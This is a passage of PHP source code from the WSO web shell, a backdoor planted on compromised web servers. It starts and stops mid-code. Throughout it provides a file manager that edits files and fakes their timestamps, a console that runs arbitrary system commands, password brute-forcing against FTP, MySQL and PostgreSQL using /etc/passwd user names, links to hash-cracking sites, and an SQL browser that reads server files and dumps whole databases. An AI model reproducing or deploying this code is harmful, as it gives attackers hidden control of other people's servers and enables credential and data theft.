\'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\'FilesTools\',null,\'\'.urlencode($f[\'name\']).\'\', \'view\')">\'.htmlspecialchars($f[\'name\']):\'g(\'FilesMan\',\'\'.$f[\'path\'].\'\');" \' . (empty ($f[\'link\']) ? \'\' : "title=\'{$f[\'link\']}\'") . \'><b>[ \' . htmlspecialchars($f[\'name\']) . \' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?wsoViewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\'FilesTools\',null,\'\'.urlencode($f[\'name\']).\'\',\'chmod\')">\'.$f[\'perms\'] .\'</td><td><a href="#" onclick="g(\'FilesTools\',null,\'\'.urlencode($f[\'name\']).\'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'\'.urlencode($f[\'name\']).\'\', \'touch\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a href="#" onclick="g(\'FilesTools\',null,\'\'.urlencode($f[\'name\']).\'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'\'.urlencode($f[\'name\']).\'\', \'download\')">D</a>\':\'\').\'</td></tr>\'; $l = $l?0:1; } echo "<tr><td colspan=7>
<input type=hidden name=a value=\'FilesMan\'>
<input type=hidden name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'>
<input type=hidden name=charset value=\'". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\')."\'>
<select name=\'p1\'><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option>"; if(class_exists(\'ZipArchive\')) echo "<option value=\'zip\'>Compress (zip)</option><option value=\'unzip\'>Uncompress (zip)</option>"; echo "<option value=\'tar\'>Compress (tar.gz)</option>"; if(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\'])) echo "<option value=\'paste\'>Paste / Compress</option>"; echo "</select> "; if(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\']) && (($_COOKIE[\'act\'] == \'zip\') || ($_COOKIE[\'act\'] == \'tar\'))) echo "file name: <input type=text name=p2 value=\'wso_" . date("Ymd_His") . "." . ($_COOKIE[\'act\'] == \'zip\'?\'zip\':\'tar.gz\') . "\'> "; echo "<input type=\'submit\' value=\'>>\'></td></tr></form></table></div>"; wsoFooter(); } function actionStringTools() { if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists(\'binhex\')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}} if(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';for($i=0;$i<strlen($p);++$i)$r.= sprintf(\'%02X\',ord($p[$i]));return strtoupper($r);}} if(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';for($i=0;$i<strlen($p);++$i)$r.= \'%\'.dechex(ord($p[$i]));return strtoupper($r);}} $stringTools = array( \'Base64 encode\' => \'base64_encode\', \'Base64 decode\' => \'base64_decode\', \'Url encode\' => \'urlencode\', \'Url decode\' => \'urldecode\', \'Full urlencode\' => \'full_urlencode\', \'md5 hash\' => \'md5\', \'sha1 hash\' => \'sha1\', \'crypt\' => \'crypt\', \'CRC32\' => \'crc32\', \'ASCII to HEX\' => \'ascii2hex\', \'HEX to ASCII\' => \'hex2ascii\', \'HEX to DEC\' => \'hexdec\', \'HEX to BIN\' => \'hex2bin\', \'DEC to HEX\' => \'dechex\', \'DEC to BIN\' => \'decbin\', \'BIN to HEX\' => \'binhex\', \'BIN to DEC\' => \'bindec\', \'String to lower case\' => \'strtolower\', \'String to upper case\' => \'strtoupper\', \'Htmlspecialchars\' => \'htmlspecialchars\', \'String length\' => \'strlen\', ); if(isset($_POST[\'ajax\'])) { WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true); ob_start(); if(in_array($_POST[\'p1\'], $stringTools)) echo $_POST[\'p1\']($_POST[\'p2\']); $temp = "document.getElementById(\'strOutput\').style.display=\'\';document.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"
\\'")."\';
"; echo strlen($temp), "
", $temp; exit; } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0); wsoHeader(); echo \'<h1>String conversions</h1><div class=content>\'; echo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;\'><select name=\'selectTool\'>"; foreach($stringTools as $k => $v) echo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>"; echo "</select><input type=\'submit\' value=\'>>\'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\')."> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>".(empty($_POST[\'p1\'])?\'\':htmlspecialchars(@$_POST[\'p2\']))."</textarea></form><pre class=\'ml1\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\':\'\')."margin-top:5px\' id=\'strOutput\'>"; if(!empty($_POST[\'p1\'])) { if(in_array($_POST[\'p1\'], $stringTools))echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\'])); } echo"</pre></div><br><h1>Search files:</h1><div class=content>
<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding=\'1\' cellspacing=\'0\' width=\'50%\'>
<tr><td width=\'1%\'>Text:</td><td><input type=\'text\' name=\'text\' style=\'width:100%\'></td></tr>
<tr><td>Path:</td><td><input type=\'text\' name=\'cwd\' value=\'". htmlspecialchars($GLOBALS[\'cwd\']) ."\' style=\'width:100%\'></td></tr>
<tr><td>Name:</td><td><input type=\'text\' name=\'filename\' value=\'*\' style=\'width:100%\'></td></tr>
<tr><td></td><td><input type=\'submit\' value=\'>>\'></td></tr>
</table></form>"; function wsoRecursiveGlob($path) { if(substr($path, -1) != \'/\') $path.=\'/\'; $paths = @array_unique(@array_merge(@glob($path.$_POST[\'p3\']), @glob($path.\'*\', GLOB_ONLYDIR))); if(is_array($paths)&&@count($paths)) { foreach($paths as $item) { if(@is_dir($item)){ if($path!=$item) wsoRecursiveGlob($item); } else { if(empty($_POST[\'p2\']) || @strpos(file_get_contents($item), $_POST[\'p2\'])!==false) echo "<a href=\'#\' onclick=\'g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\",\"\")\'>".htmlspecialchars($item)."</a><br>"; } } } } if(@$_POST[\'p3\']) wsoRecursiveGlob($_POST[\'c\']); echo "</div><br><h1>Search for hash:</h1><div class=content>
<form method=\'post\' target=\'_blank\' name=\'hf\'>
<input type=\'text\' name=\'hash\' style=\'width:200px;\'><br>
<input type=\'hidden\' name=\'act\' value=\'find\'/>
<input type=\'button\' value=\'hashcracking.ru\' onclick=\"document.hf.action=\'https://hashcracking.ru/index.php\';document.hf.submit()\"><br>
<input type=\'button\' value=\'md5.rednoize.com\' onclick=\"document.hf.action=\'http://md5.rednoize.com/?q=\'+document.hf.hash.value+\'&s=md5\';document.hf.submit()\"><br>
<input type=\'button\' value=\'crackfor.me\' onclick=\"document.hf.action=\'http://crackfor.me/index.php\';document.hf.submit()\"><br>
</form></div>"; wsoFooter(); } function actionFilesTools() { if( isset($_POST[\'p1\']) ) $_POST[\'p1\'] = urldecode($_POST[\'p1\']); if(@$_POST[\'p2\']==\'download\') { if(@is_file($_POST[\'p1\']) && @is_readable($_POST[\'p1\'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST[\'p1\'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST[\'p1\']); header("Content-Type: " . $type); } else header("Content-Type: application/octet-stream"); $fp = @fopen($_POST[\'p1\'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST[\'p2\'] == \'mkfile\' ) { if(!file_exists($_POST[\'p1\'])) { $fp = @fopen($_POST[\'p1\'], \'w\'); if($fp) { $_POST[\'p2\'] = "edit"; fclose($fp); } } } wsoHeader(); echo \'<h1>File tools</h1><div class=content>\'; if( !file_exists(@$_POST[\'p1\']) ) { echo \'File not exists\'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST[\'p1\'])); if(!$uid) { $uid[\'name\'] = @fileowner($_POST[\'p1\']); $gid[\'name\'] = @filegroup($_POST[\'p1\']); } else $gid = @posix_getgrgid(@filegroup($_POST[\'p1\'])); echo \'<span>Name:</span> \'.htmlspecialchars(@basename($_POST[\'p1\'])).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?wsoViewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.wsoPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\'; echo \'<span>Create time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\'; if( empty($_POST[\'p2\']) ) $_POST[\'p2\'] = \'view\'; if( is_file($_POST[\'p1\']) ) $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\'); else $m = array(\'Chmod\', \'Rename\', \'Touch\'); foreach($m as $v) echo \'<a href=# onclick="g(null,null,\'\' . urlencode($_POST[\'p1\']) . \'\',\'\'.strtolower($v).\'\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \'; echo \'<br><br>\'; switch($_POST[\'p2\']) { case \'view\': echo \'<pre class=ml1>\'; $fp = @fopen($_POST[\'p1\'], \'r\'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo \'</pre>\'; break; case \'highlight\': if( @is_readable($_POST[\'p1\']) ) { echo \'<div class=ml1 style="background-color: #e1e1e1;color:black;">\'; $code = @highlight_file($_POST[\'p1\'],true); echo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\'; } break; case \'chmod\': if( !empty($_POST[\'p3\']) ) { $perms = 0; for($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i) $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1)); if(!@chmod($_POST[\'p1\'], $perms)) echo \'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>\'; } clearstatcache(); echo \'<script>p3_="";</script><form onsubmit="g(null,null,\'\' . urlencode($_POST[\'p1\']) . \'\',null,this.chmod.value);return false;"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value=">>"></form>\'; break; case \'edit\': if( !is_writable($_POST[\'p1\'])) { echo \'File isn\'t writeable\'; break; } if( !empty($_POST[\'p3\']) ) { $time = @filemtime($_POST[\'p1\']); $_POST[\'p3\'] = substr($_POST[\'p3\'],1); $fp = @fopen($_POST[\'p1\'],"w"); if($fp) { @fwrite($fp,$_POST[\'p3\']); @fclose($fp); echo \'Saved!<br><script>p3_="";</script>\'; @touch($_POST[\'p1\'],$time,$time); } } echo \'<form onsubmit="g(null,null,\'\' . urlencode($_POST[\'p1\']) . \'\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>\'; $fp = @fopen($_POST[\'p1\'], \'r\'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo \'</textarea><input type=submit value=">>"></form>\'; break; case \'hexdump\': $c = @file_get_contents($_POST[\'p1\']); $n = 0; $h = array(\'00000000<br>\',\'\',\'\'); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \'; switch ( ord($c[$i]) ) { case 0: $h[2] .= \' \'; break; case 9: $h[2] .= \' \'; break; case 10: $h[2] .= \' \'; break; case 13: $h[2] .= \' \'; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';} $h[1] .= \'<br>\'; $h[2] .= "
"; } } echo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\'; break; case \'rename\': if( !empty($_POST[\'p3\']) ) { if(!@rename($_POST[\'p1\'], $_POST[\'p3\'])) echo \'Can\'t rename!<br>\'; else die(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\'); } echo \'<form onsubmit="g(null,null,\'\' . urlencode($_POST[\'p1\']) . \'\',null,this.name.value);return false;"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value=">>"></form>\'; break; case \'touch\': if( !empty($_POST[\'p3\']) ) { $time = strtotime($_POST[\'p3\']); if($time) { if(!touch($_POST[\'p1\'],$time,$time)) echo \'Fail!\'; else echo \'Touched!\'; } else echo \'Bad time format!\'; } clearstatcache(); echo \'<script>p3_="";</script><form onsubmit="g(null,null,\'\' . urlencode($_POST[\'p1\']) . \'\',null,this.touch.value);return false;"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value=">>"></form>\'; break; } echo \'</div>\'; wsoFooter(); } function actionConsole() { if(!empty($_POST[\'p1\']) && !empty($_POST[\'p2\'])) { WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', true); $_POST[\'p1\'] .= \' 2>&1\'; } elseif(!empty($_POST[\'p1\'])) WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', 0); if(isset($_POST[\'ajax\'])) { WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true); ob_start(); echo "d.cf.cmd.value=\'\';
"; $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("
$ ".$_POST[\'p1\']."
".wsoEx($_POST[\'p1\']),"
\\'")); if(preg_match("!.*cd\s+([^;]+)$!",$_POST[\'p1\'],$match)) { if(@chdir($match[1])) { $GLOBALS[\'cwd\'] = @getcwd(); echo "c_=\'".$GLOBALS[\'cwd\']."\';"; } } echo "d.cf.output.value+=\'".$temp."\';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "
", $temp; exit; } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0); wsoHeader(); echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array(\'\');
var cur = 0;
function kp(e) {
var n = (window.Event) ? e.which : e.keyCode;
if(n == 38) {
cur--;
if(cur>=0)
document.cf.cmd.value = cmds[cur];
else
cur++;
} else if(n == 40) {
cur++;
if(cur < cmds.length)
document.cf.cmd.value = cmds[cur];
else
cur--;
}
}
function add(cmd) {
cmds.pop();
cmds.push(cmd);
cmds.push(\'\');
cur = cmds.length-1;
}
</script>"; echo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>\'; foreach($GLOBALS[\'aliases\'] as $n => $v) { if($v == \'\') { echo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\'; continue; } echo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\'; } echo \'</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 \'.(@$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX <input type=checkbox name=show_errors value=1 \'.(!empty($_POST[\'p2\'])||$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\']?\'checked\':\'\').\'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>\'; if(!empty($_POST[\'p1\'])) { echo htmlspecialchars("$ ".$_POST[\'p1\']."
".wsoEx($_POST[\'p1\'])); } echo \'</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>\'; echo \'</form></div><script>d.cf.cmd.focus();</script>\'; wsoFooter(); } function actionLogout() { setcookie(md5($_SERVER[\'HTTP_HOST\']), \'\', time() - 3600); die(\'bye!\'); } function actionSelfRemove() { if($_POST[\'p1\'] == \'yes\') if(@unlink(preg_replace(\'!\(\d+\)\s.*!\', \'\', __FILE__))) die(\'Shell has been removed\'); else echo \'unlink error!\'; if($_POST[\'p1\'] != \'yes\') wsoHeader(); echo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>\'; wsoFooter(); } function actionBruteforce() { wsoHeader(); if( isset($_POST[\'proto\']) ) { echo \'<h1>Results</h1><div class=content><span>Type:</span> \'.htmlspecialchars($_POST[\'proto\']).\' <span>Server:</span> \'.htmlspecialchars($_POST[\'server\']).\'<br>\'; if( $_POST[\'proto\'] == \'ftp\' ) { function wsoBruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST[\'proto\'] == \'mysql\' ) { function wsoBruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.\':\'.$port?$port:3306, $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST[\'proto\'] == \'pgsql\' ) { function wsoBruteForce($ip,$port,$login,$pass) { $str = "host=\'".$ip."\' port=\'".$port."\' user=\'".$login."\' password=\'".$pass."\' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST[\'server\']); if($_POST[\'type\'] == 1) { $temp = @file(\'/etc/passwd\'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo \'<b>\'.htmlspecialchars($line[0]).\'</b>:\'.htmlspecialchars($line[0]).\'<br>\'; } if(@$_POST[\'reverse\']) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo \'<b>\'.htmlspecialchars($line[0]).\'</b>:\'.htmlspecialchars($tmp); } } } } elseif($_POST[\'type\'] == 2) { $temp = @file($_POST[\'dict\']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( wsoBruteForce($server[0],@$server[1], $_POST[\'login\'], $line) ) { $success++; echo \'<b>\'.htmlspecialchars($_POST[\'login\']).\'</b>:\'.htmlspecialchars($line).\'<br>\'; } } } echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>"; } echo \'<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>\' .\'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>\' .\'<input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\' .\'<input type=hidden name=a value="\'.htmlspecialchars($_POST[\'a\']).\'">\' .\'<input type=hidden name=charset value="\'.htmlspecialchars($_POST[\'charset\']).\'">\' .\'<span>Server:port</span></td>\' .\'<td><input type=text name=server value="127.0.0.1"></td></tr>\' .\'<tr><td><span>Brute type</span></td>\' .\'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>\' .\'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>\' .\'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>\' .\'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>\' .\'<td><input type=text name=login value="root"></td></tr>\' .\'<tr><td><span>Dictionary</span></td>\' .\'<td><input type=text name=dict value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'passwd.dic"></td></tr></table>\' .\'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>\'; echo \'</div><br>\'; wsoFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case \'mysql\': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case \'pgsql\': $host = explode(\':\', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case \'mysql\': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case \'mysql\': return $this->res = @mysql_query($str); break; case \'pgsql\': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case \'mysql\': return @mysql_fetch_assoc($res); break; case \'pgsql\': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case \'mysql\': return $this->query("SHOW databases"); break; case \'pgsql\': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!=\'t\'"); break; } return false; } function listTables() { switch($this->type) { case \'mysql\': return $this->res = $this->query(\'SHOW TABLES\'); break; case \'pgsql\': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != \'information_schema\' AND table_schema != \'pg_catalog\'"); break; } return false; } function error() { switch($this->type) { case \'mysql\': return @mysql_error(); break; case \'pgsql\': return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case \'mysql\': if(function_exists(\'mysql_set_charset\')) return @mysql_set_charset($str, $this->link); else $this->query(\'SET CHARSET \'.$str); break; case \'pgsql\': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case \'mysql\': return $this->fetch($this->query("SELECT LOAD_FILE(\'".addslashes($str)."\') as file")); break; case \'pgsql\': $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM \'".addslashes($str)."\';select file from wso2;"); $r=array(); while($i=$this->fetch()) $r[] = $i[\'file\']; $this->query(\'drop table wso2\'); return array(\'file\'=>implode("
",$r)); break; } return false; } function dump($table, $fp = false) { switch($this->type) { case \'mysql\': $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\'); $create = mysql_fetch_array($res); $sql = $create[1].";
"; if($fp) fwrite($fp, $sql); else echo($sql); $this->query(\'SELECT * FROM `\'.$table.\'`\'); $i = 0; $head = true; while($item = $this->fetch()) { $sql = \'\'; if($i % 1000 == 0) { $head = true; $sql = ";
"; } $columns = array(); foreach($item as $k=>$v) { if($v === null) $item[$k] = "NULL"; elseif(is_int($v)) $item[$k] = $v; else $item[$k] = "\'".@mysql_real_escape_string($v)."\'"; $columns[] = "`".$k."`"; } if($head) { $sql .= \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).") VALUES
(".implode(", ", $item).\')\'; $head = false; } else $sql .= "
,(".implode(", ", $item).\')\'; if($fp) fwrite($fp, $sql); else echo($sql); $i++; } if(!$head) if($fp) fwrite($fp, ";
"); else echo(";
"); break; case \'pgsql\': $this->query(\'SELECT * FROM \'.$table); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = "\'".addslashes($v)."\'"; $columns[] = $k; } $sql = \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\'."
"; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; $db = new DbClass($_POST[\'type\']); if(@$_POST[\'p2\']==\'download\') { $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']); $db->selectdb($_POST[\'sql_base\']); switch($_POST[\'charset\']) { case "Windows-1251": $db->setCharset(\'cp1251\'); break; case "UTF-8": $db->setCharset(\'utf8\'); break; case "KOI8-R": $db->setCharset(\'koi8r\'); break; case "KOI8-U": $db->setCharset(\'koi8u\'); break; case "cp866": $db->setCharset(\'cp866\'); break; } if(empty($_POST[\'file\'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach($_POST[\'tbl\'] as $v) $db->dump($v); exit; } elseif($fp = @fopen($_POST[\'file\'], \'w\')) { foreach($_POST[\'tbl\'] as $v) $db->dump($v, $fp); fclose($fp); unset($_POST[\'p2\']); } else die(\'<script>alert("Error! Can\'t open file");window.history.back(-1)</script>\'); } wsoHeader(); echo "
<h1>Sql browser</h1><div class=content>
<form name=\'sf\' method=\'post\' onsubmit=\'fs(this);\'><table cellpadding=\'2\' cellspacing=\'0\'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=a value=Sql><input type=hidden name=p1 value=\'query\'><input type=hidden name=p2 value=\'\'><input type=hidden name=c value=\'". htmlspecialchars($GLOBALS[\'cwd\']) ."\'><input type=hidden name=charset value=\'". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') ."\'>
<td><select name=\'type\'><option value=\'mysql\' "; if(@$_POST[\'type\']==\'mysql\')echo \'selected\'; echo ">MySql</option><option value=\'pgsql\' "; if(@$_POST[\'type\']==\'pgsql\')echo \'selected\'; echo ">PostgreSql</option></select></td>
<td><input type=text name=sql_host value=\"". (empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])) ."\"></td>
<td><input type=text name=sql_login value=\"". (empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])) ."\"></td>
<td><input type=text name=sql_pass value=\"". (empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])) ."\"></td><td>"; $tmp = "<input type=text name=sql_base value=\'\'>"; if(isset($_POST[\'sql_host\'])){ if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) { switch($_POST[\'charset\']) { case "Windows-1251": $db->setCharset(\'cp1251\'); break; case "UTF-8": $db->setCharset(\'utf8\'); break; case "KOI8-R": $db->setCharset(\'koi8r\'); break; case "KOI8-U": $db->setCharset(\'koi8u\'); break; case "cp866": $db->setCharset(\'cp866\'); break; } $db->listDbs(); echo "<select name=sql_base><option value=\'\'></option>"; while($item = $db->fetch()) { list($key, $value) = each($item); echo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\'; } echo \'</select>\'; } else echo $tmp; }else echo $tmp; echo "</td>
<td><input type=submit value=\'>>\' onclick=\'fs(d.sf);\'></td>
<td><input type=checkbox name=sql_count value=\'on\'" . (empty($_POST[\'sql_count\'])?\'\':\' checked\') . "> count the number of rows</td>
</tr>
</table>
<script>
s_db=\'".@addslashes($_POST[\'sql_base\'])."\';
function fs(f) {
if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
if(f.p1) f.p1.value=\'\';
if(f.p2) f.p2.value=\'\';
if(f.p3) f.p3.value=\'\';
}
}
function st(t,l) {
d.sf.p1.value = \'select\';
d.sf.p2.value = t;
if(l && d.sf.p3) d.sf.p3.value = l;
d.sf.submit();
}
function is() {
for(i=0;i<d.sf.elements[\'tbl[]\'].length;++i)
d.sf.elements[\'tbl[]\'][i].checked = !d.sf.elements[\'tbl[]\'][i].checked;
}
